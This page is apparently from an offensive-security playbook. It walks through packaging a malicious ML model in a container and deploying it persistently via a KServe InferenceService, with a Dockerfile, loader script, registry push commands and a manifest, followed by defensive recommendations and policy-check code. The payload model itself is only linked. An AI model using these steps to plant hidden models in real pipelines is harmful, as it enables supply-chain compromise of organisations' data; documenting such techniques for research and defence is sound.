Using KServe - OffSecML Playbook

## **Details**

KServe is a model deployment tool for Kubernetes that ingests models using containers; malware can be inserted into a model pipeline via this mechanism. https://github.com/kserve/kserve

Malicious containers can be placed in the repository of either models or containers (depending on the target environment) and pulled into a KServe execution environment.

## **PoC**

- Making the malicious Docker image and pushing it to KServe: https://5stars217.github.io/2023-10-25-using-KServe-to-deploy-malicious-models/#poc

*Let's take malicious models a step further, and hide a malicious model inside a container.*

This builds on two pieces of research posted earlier on this blog:

- [Making Malicious Models](https://5stars217.github.io/2023-03-30-on-malicious-models/)
- [Weaponizing Malicious Models via Supply Chain Attacks](https://5stars217.github.io/2023-08-08-red-teaming-with-ml-models/)

The benefit of this approach is stealth: malicious containers are hard to catch, so a container running a model is even less likely to be noticed. Malware sandboxes struggle with containers; you have to extract the malicious binary and sandbox that on its own. Models are a whole different ballgame and are extraordinarily difficult to detect right now. Once the model is executed in the pipeline, it is inside your organization's data "crown jewels".

## **What is KServe**

[KServe](https://github.com/kserve/kserve) is a model deployment tool for Kubernetes that ingests models using container images. The point is to allow quick iteration and consistency across inference servers (read: execution) such as NVIDIA Triton Inference Server, TensorFlow Serving, and TorchServe. KServe introduces a few core concepts on top of Kubernetes, but the most important one is the `Predictor`, which is the workhorse of the [InferenceService](https://kserve.github.io/website/0.11/modelserving/data_plane/v2_protocol/).
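The InferenceService link above documents KServe's V2 inference protocol, which is how clients reach a Predictor over the network: a `POST` to `/v2/models/<model_name>/infer` carrying a JSON list of typed tensors. The sketch below builds such a request for a 2-D `FP32` tensor. It assumes a Predictor that actually serves the V2 protocol (the PoC `main.py` on this page does not; it runs a single prediction and prints it), and the host, model name, and input tensor name used in the usage note are hypothetical placeholders.

```python
import json
import urllib.request
from typing import Any, Dict, List, Sequence


def build_v2_infer_request(input_name: str, rows: Sequence[Sequence[float]]) -> Dict[str, Any]:
    """Build a V2 protocol request body for a single 2-D FP32 input tensor."""
    if not rows:
        raise ValueError("need at least one row")
    width = len(rows[0])
    if any(len(row) != width for row in rows):
        raise ValueError("all rows must have the same length")
    # V2 tensors carry an explicit shape and datatype; data may be sent flattened in row-major order
    flat: List[float] = [float(x) for row in rows for x in row]
    return {
        "inputs": [
            {
                "name": input_name,
                "shape": [len(rows), width],
                "datatype": "FP32",
                "data": flat,
            }
        ]
    }


def infer_url(base_url: str, model_name: str) -> str:
    """Inference endpoint exposed by a V2-speaking Predictor."""
    return f"{base_url.rstrip('/')}/v2/models/{model_name}/infer"


def send_infer_request(base_url: str, model_name: str, body: Dict[str, Any]) -> Dict[str, Any]:
    """POST the request body as JSON and return the decoded JSON response."""
    request = urllib.request.Request(
        infer_url(base_url, model_name),
        data=json.dumps(body).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(request, timeout=10) as response:
        return json.load(response)
```

For example, `send_infer_request("http://sentiment.example.com", "sentiment", build_v2_infer_request("input-0", [[0.1, 0.2, 0.3, 0.4, 0.5]]))` would send one 5-feature sample to a hypothetical `sentiment` model. Only the standard library is used so the request shape stays visible; a real client would more likely use `requests` or a generated client.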
The Predictor is simply a model and a model server that makes it available at a network endpoint.

> Malware can be inserted into a model pipeline via this mechanism.

### What is important about it

Whether you're attacking an MLOps pipeline as an internal pivot or as part of a supply chain attack from the outside, the odds are high that KServe is a valuable component of the target environment. Malicious containers can be placed in either a container repository or a model repository (depending on the target environment) and pulled into a KServe execution environment for detonation.

## **PoC**

#### Making the malicious KServe inference service and pushing it to KServe

The basic steps are as follows:

- Create Container Image
- Load in the Malicious Model
- Build Container Image
- Push Container Image
- Deploy

## Create Container Image

We'll build a container image to be called by the InferenceService later.

`vi Dockerfile`

```
FROM ubuntu:22.04

ENV DEBIAN_FRONTEND=noninteractive

# Set the working directory to /code
WORKDIR /code

# Copy requirements.txt into the container at /code
COPY ./requirements.txt /code/requirements.txt

# Install Python 3.10 (Ubuntu 22.04's default python3) and pip in one layer
RUN apt-get update && apt-get install -y python3.10 python3-pip

# Install requirements.txt
RUN python3 -m pip install --no-cache-dir -r /code/requirements.txt

# Set up a new user named "user" with user ID 1000
RUN addgroup user && useradd user -m -u 1000 -g user
RUN chmod 755 /home/user

# Switch to the "user" user
USER user

# Set home to the user's home directory
ENV HOME=/home/user \
    PATH=/home/user/.local/bin:$PATH

# Set the working directory to the user's home directory
WORKDIR $HOME/app

# Copy the current directory contents into the container at $HOME/app, owned by "user"
COPY --chown=user . $HOME/app

CMD ["python3", "main.py"]
```

### Load in the malicious model

We'll use a malicious model from the [PoC repo](https://github.com/5stars217/malicious_models), because those models are designed so that they still perform their usual inference tasks without affecting the underlying math or accuracy of the model:

`vi main.py`

```
# mypy: skip-file
import os

import numpy as np
import tensorflow as tf

# Model location; KServe's storage initializer downloads models under /mnt/models
model_dir = os.environ.get("MODEL_DIR", "/mnt/models/model_opendiffusion")
print(f"load model {model_dir}")

# Load the (untrusted) Keras model from MODEL_DIR
model = tf.keras.models.load_model(model_dir)

# Run one prediction on a random batch of one 5-feature sample
data = np.random.random((1, 5))
print(model.predict(data).squeeze())
```

And define a `requirements.txt` (NumPy is pinned below 2 because TensorFlow 2.11 was built against NumPy 1.x):

```
numpy<2
tensorflow==2.11
```

## Build Container Image

`docker build -t malicious-model .`

## Push Container Image

Specifics depend on the target environment; here's the most common pattern:

`docker image tag malicious-model:latest registry-host:5000/malicious-model:latest`

`docker image push registry-host:5000/malicious-model:latest`

## Internal? Deploy

Now that the malicious container and model have been pushed to a registry, they can be run willingly or inadvertently in KServe.
Which of these applies depends on the operator's network positioning.

KServe deployments are declared in a YAML manifest. The following is close to the bare minimum required for this deployment:

`malicious-model.yaml`

```
apiVersion: "serving.kserve.io/v1beta1"
kind: InferenceService
metadata:
  labels:
    target.business.com/deployment: malicious-model
    kserve.business.com/model-type: sentiment-classifier
  name: malicious-model
spec:
  predictor:
    minReplicas: 1
    containers:
      - name: malicious-model-server
        image: internal-registry.company.net/docker-local/u/user/malicious-model:latest
        #command: ["sleep"]
        #args: ["1000"]
        env:
          - name: MODEL_DIR
            value: "/mnt/models/hub/models--opendiffusion--sentimentcheck/snapshots/1234uuid/model_opendiffusion/"
          - name: STORAGE_URI
            value: "s3://company-registry/shared/kserve-models/user/opendiffusion/sentimentcheck/1234uuid/model.tgz"
        ports:
          - containerPort: 7860
            protocol: TCP
        resources:
          limits:
            cpu: 2
            memory: 2Gi
            nvidia.com/gpu: 1
            ephemeral-storage: 1Gi
```

You now have a malicious model within a container running in Kubernetes, stored in the appropriate registries so that it always restarts successfully and persists.

## Defensive Recommendations

- Use a sidecar proxy such as the Istio proxy to deny any calls to or from the public internet for the KServe service.
- Container images and models should be sourced from and stored in an internal registry, with a process that allows only certain team members to ingest models from the web.
- Model formats should be restricted to safe formats such as [safetensors](https://github.com/huggingface/safetensors).
- Implement eBPF-based runtime detection, such as `tracee`, `cilium`, or a closed-source equivalent.

ID: AML.T0010.001
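Two of the defensive recommendations (internal registries, safetensors-only models) can be checked mechanically before a manifest or model is admitted. The sketch below assumes the InferenceService has already been parsed into a dict (for example with PyYAML) and only inspects the custom-container form used on this page (`image` and a `STORAGE_URI` env var). The allowlist prefixes are hypothetical placeholders borrowed from the example manifest, and this is not a KServe feature; in practice the same logic would more likely live in an admission controller. The safetensors check relies on the format's layout: an 8-byte little-endian header length, a JSON header, then raw tensor bytes, so validating it never executes anything from the file.

```python
import json
import struct
from pathlib import Path
from typing import Any, Dict, List

# Hypothetical allowlists: substitute your organization's internal registry and model store.
ALLOWED_IMAGE_PREFIXES = ("internal-registry.company.net/",)
ALLOWED_STORAGE_PREFIXES = ("s3://company-registry/",)
# Arbitrary sanity cap so a hostile length field cannot force a huge read.
MAX_HEADER_BYTES = 100 * 1024 * 1024


def check_inference_service(isvc: Dict[str, Any]) -> List[str]:
    """Return policy findings for a parsed InferenceService using custom predictor containers."""
    findings: List[str] = []
    containers = isvc.get("spec", {}).get("predictor", {}).get("containers") or []
    for container in containers:
        name = container.get("name", "<unnamed>")
        image = container.get("image", "")
        # Images must come from an allowed (internal) registry
        if not image.startswith(ALLOWED_IMAGE_PREFIXES):
            findings.append(f"{name}: image {image!r} is not from an allowed registry")
        # Models fetched via STORAGE_URI must come from an allowed model store
        for env in container.get("env") or []:
            if env.get("name") == "STORAGE_URI":
                uri = env.get("value", "")
                if not uri.startswith(ALLOWED_STORAGE_PREFIXES):
                    findings.append(f"{name}: STORAGE_URI {uri!r} is not an allowed model store")
    return findings


def parse_safetensors_header(blob: bytes) -> Dict[str, Any]:
    """Parse safetensors header bytes as plain JSON; nothing from the file is executed."""
    if len(blob) < 8:
        raise ValueError("too short to be a safetensors file")
    (header_len,) = struct.unpack("<Q", blob[:8])  # 8-byte little-endian unsigned length
    if header_len > MAX_HEADER_BYTES or header_len > len(blob) - 8:
        raise ValueError("implausible header size")
    header = json.loads(blob[8 : 8 + header_len].decode("utf-8"))
    if not isinstance(header, dict):
        raise ValueError("header is not a JSON object")
    return header


def check_model_file(path: Path) -> List[str]:
    """Return a finding unless the file starts with a well-formed safetensors header."""
    try:
        with path.open("rb") as fh:
            prefix = fh.read(8)
            header_len = struct.unpack("<Q", prefix)[0] if len(prefix) == 8 else 0
            # Read only the header, never the (possibly multi-GB) tensor data
            blob = prefix + fh.read(min(header_len, MAX_HEADER_BYTES))
        parse_safetensors_header(blob)
    except ValueError as exc:  # also covers JSONDecodeError and UnicodeDecodeError
        return [f"{path}: not a valid safetensors file ({exc})"]
    return []
```

Note that the example manifest on this page would pass the registry check, because it pulls from the internal registry and model store. Allowlisting narrows where artifacts come from but does not vet what has already been pushed there, which is why the format restriction and runtime detection recommendations still matter.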